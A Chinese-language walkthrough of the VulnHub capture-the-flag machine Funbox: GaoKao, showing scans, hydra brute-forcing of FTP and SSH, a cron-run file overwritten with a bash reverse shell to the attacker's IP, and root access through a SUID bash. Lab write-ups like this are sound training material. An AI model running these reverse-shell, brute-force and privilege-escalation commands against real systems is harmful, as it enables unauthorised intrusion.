1、環境介紹

靶場介紹：https://www.vulnhub.com/entry/funbox-gaokao,707/
靶場下載：https://download.vulnhub.com/funbox/FunboxGaoKao.ova
靶場難度：簡單
發布日期：2021年06月06日
文件大小：1.3 GB
靶場作者：0815R2d2
靶場系列：Funbox
靶場描述：

• 這是一個初學者的盒子，但并不容易。小心收集！！
• 提示：不要浪費時間！每個帳戶嘗試1500次后，所有端口的每一次BruteForce攻擊都可以停止。
• 享受游戲和所見即所得！這在 VirtualBox 而不是 VMware 中更有效

打靶耗時：2+小時，非常的簡單，而且不用做長時間爆破（我做的時候沒看提示，所以依然做了一些爆破和目錄掃描）
打靶關鍵：

1. 所見即所得，不用做 Web 目錄掃描
2. FTP 密碼爆破、FTP 基礎操作
3. Linux 信息收集、SUID 提權

2、主機發現與端口掃描

攻擊機 IP	192.168.56.3
靶機 IP	192.168.56.40

(base) ┌──(root?kali)-[~] (??????)?? 
└─# arp-scan -l 
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.40   08:00:27:26:0a:e0       PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.442 seconds (104.83 hosts/sec). 2 responded

(base) ┌──(root?kali)-[~] (??????)?? 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.40
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-23 00:51 EST
Nmap scan report for 192.168.56.40
Host is up (0.00060s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after:  2031-06-03T15:15:30
|_ssl-date: TLS randomness does not represent time
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 4
|   Capabilities flags: 65535
|   Some Capabilities: IgnoreSpaceBeforeParenthesis, ODBCClient, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongPassword, SupportsCompression, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, FoundRows, SupportsLoadDataLocal, ConnectWithDatabase, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: 4r\x1B(C\P`BdFk\x12.b8J\x17*\x15
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:26:0A:E0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.56.40OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

3、21端口 - FTP

• 找到一個郵件模本文件「welcome.msg」
  • 獲取到了一個用戶名：sky
• 免登錄用戶，禁止上傳文件

(base) ┌──(root?kali)-[~] (??????)?? 
└─# ftp 192.168.56.40
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.56.3 !
230-
230-The local time is: Thu Nov 23 06:15:14 2023
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39241|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
226 Transfer complete
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||10481|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |*************************************************************************************|   169        1.66 MiB/s    00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (100.20 KiB/s)
ftp> exit
221 Goodbye.

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
229 Entering Extended Passive Mode (|||25285|)
550 php-reverse-shell.php: Operation not permitted

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# cat welcome.msg             
Welcome, archive user %U@%R !The local time is: %TThis is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to <sky@%L>.

4、80端口 - Web

4.1、目錄掃描（所見即所得）

• 沒掃到什么目錄

# 基礎小字典，初掃摸底
dirb http://192.168.56.40
# 較全面 conda activate py37
dirsearch -u http://192.168.56.40 -t 64 -e *
# 包含靜態檢查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.40" -j yes -b yes
# 較全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.40 -lcf
# 常規文件掃描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可執行文件掃描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 壓縮包，備份掃描
gobuster dir -u http://192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q

• http://192.168.56.40/index.html

5、3306端口 - MySQL

• 也沒有什么好利用的

6、除了一個用戶名，啥也沒有了

6.1、嘗試SSH爆破（同步 FTP 爆破）（失敗）

• 爆破近3小時無果

hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 4 192.168.56.40 ssh

6.2、嘗試FTP爆破

• 獲取 FTP 用戶密碼：login: sky password: thebest
• 如果 FTP 依然爆破失敗，就嘗試 MySQL 爆破

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.40 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-23 06:51:56
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.40:21/
[STATUS] 695.00 tries/min, 695 tries in 00:01h, 14343738 to do in 343:59h, 30 active
[21][ftp] host: 192.168.56.40   login: sky   password: thebest
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-23 06:53:10

6.3、FTP 下載

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# ftp 192.168.56.40
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11605|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
226 Transfer complete
ftp> get user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||44739|)
150 Opening BINARY mode data connection for user.flag (66 bytes)
100% |*********************************************************************|    66      153.09 KiB/s    00:00 ETA
226 Transfer complete
66 bytes received in 00:00 (3.48 KiB/s)
ftp> exit
221 Goodbye.

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# cat user.flag      
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"

6.4、密文破解（失敗）

• 嘗試了各種方式，密文都破解不了，那就只是「flag」而沒有隱藏信息

88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd

6.5、修改文件，嘗試上傳（反彈連接）

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# cat user.flag                                         
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.56.3/4444 0>&1'

• 上傳前后，文件大小與日期發生了變更，應該是上傳成功了

(base) ┌──(root?kali)-[~/soft/hack] (??????)?? 
└─# ftp 192.168.56.40                                    
Connected to 192.168.56.40.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.40]
Name (192.168.56.40:root): sky
331 Password required for sky
Password: 
230 User sky logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||34845|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
226 Transfer complete
ftp> put user.flag 
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||22920|)
150 Opening BINARY mode data connection for user.flag
100% |*********************************************************************|    65      729.61 KiB/s    00:00 ETA
226 Transfer complete
65 bytes sent in 00:00 (43.80 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||1266|)
150 Opening ASCII mode data connection for file list
-rwxr-x---   1 sky      sarah          65 Nov 22 13:58 user.flag
226 Transfer complete
ftp> exit
221 Goodbye.

(base) ┌──(root?kali)-[~] (??????)?? 
└─# nc -lvnp 4444           
listening on [any] 4444 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.40] 54186
bash: cannot set terminal process group (2686): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$

7、信息收集

7.1、基礎信息收集

• 看到了上面利用的定時任務：bash -i /home/sky/user.flag > /dev/null
  • 誰會知道這個東西還有定時任務呀。。。

bash-4.4$ history
history1  history
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ sudo -l
sudo -l
[sudo] password for sarah: Sorry, try again.
[sudo] password for sarah: Sorry, try again.
[sudo] password for sarah: sudo: 3 incorrect password attempts
bash-4.4$ /usr/sbin/getcap -r / 2>/dev/null                                 
/usr/sbin/getcap -r / 2>/dev/null
bash-4.4$ crontab -l
crontab -l
*/1     *       *       *       *       bash -i /home/sky/user.flag > /dev/null
bash-4.4$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
bash-4.4$ hostnamectl
hostnamectlStatic hostname: funbox9Icon name: computer-vmChassis: vmMachine ID: ed2d094d18af4c1ba3eb96a785c4717dBoot ID: c993f09e5fe74e09849af2b3fe0674d6Virtualization: oracleOperating System: Ubuntu 18.04.5 LTSKernel: Linux 4.15.0-144-genericArchitecture: x86-64
bash-4.4$ echo $PATH
echo $PATH
/usr/bin:/bin
bash-4.4$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release

7.2、文件信息收集

• 發現了具有S權限的/bin/bash
  • -rwsr-sr-x 1 root root 1113504 Jun 6 2019 /bin/bash

bash-4.4$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-sr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Sep 16  2020 /bin/umount
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 root mail 96648 Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 113528 Feb  2  2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
lucy:x:1000:1000:lucy:/home/lucy:/bin/bash
sky:x:1001:1001:,,,:/home/sky:/bin/sh
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
postfix:x:114:115::/var/spool/postfix:/usr/sbin/nologin
alias:x:64010:117::/var/lib/qmail/alias:/bin/sh
qmaild:x:64011:117::/var/lib/qmail:/bin/sh
qmaill:x:64015:117::/var/lib/qmail:/bin/sh
qmailp:x:64016:117::/var/lib/qmail:/bin/sh
qmailq:x:64014:64010::/var/lib/qmail:/bin/sh
qmailr:x:64013:64010::/var/lib/qmail:/bin/sh
qmails:x:64012:64010::/var/lib/qmail:/bin/sh
sarah:x:1002:1002:,,,:/home/sarah:/bin/bash

8、SUID 提權

• 提權前后，命令行前綴沒有什么變化

bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)

bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
root.flag
bash-4.4# cat root.flag
cat root.flag█████?█    ██  ███▄    █  ▄▄▄▄    ?█████  ?██   ██?     ▄████  ▄▄▄       ?█████   ██ ▄█?▄▄▄       ?█████  
▓██   ? ██  ▓██? ██ ?█   █ ▓█████▄ ?██?  ██??? █ █ ??    ██? ?█??████▄    ?██?  ██? ██▄█??████▄    ?██?  ██?
?████ ?▓██  ?██?▓██  ?█ ██??██? ▄██?██?  ██???  █   ?   ?██?▄▄▄??██  ?█▄  ?██?  ██?▓███▄??██  ?█▄  ?██?  ██?
?▓█?  ?▓▓█  ?██?▓██?  ?▌██??██?█?  ?██   ██? ? █ █ ?    ?▓█  ██▓?██▄▄▄▄██ ?██   ██?▓██ █▄?██▄▄▄▄██ ?██   ██?
??█?   ??█████▓ ?██?   ▓██??▓█  ?█▓? ████▓???██? ?██?   ??▓███?? ▓█   ▓██?? ████▓???██? █▄▓█   ▓██?? ████▓??? ?   ??▓? ? ? ? ??   ? ? ??▓███??? ?????? ?? ? ?▓ ?    ??   ?  ??   ▓?█?? ?????? ? ?? ▓???   ▓?█?? ?????? ?     ???? ? ? ? ??   ? ?????   ?   ? ? ?? ??   ?? ?     ?   ?   ?   ?? ?  ? ? ?? ? ?? ?? ?   ?? ?  ? ? ?? ? ?    ??? ? ?    ?   ? ?  ?    ? ? ? ? ?   ?    ?     ? ?   ?   ?   ?   ? ? ? ?  ? ?? ?  ?   ?   ? ? ? ?  ?              ?  ?          ? ?   ?    ?           ?       ?  ?    ? ?  ?  ?        ���  ?    ? ?  ?                                                                          You did it ! 
THX for playing Funbox: GAOKAO !I look forward to see this screenshot on twitter: @0815R2d2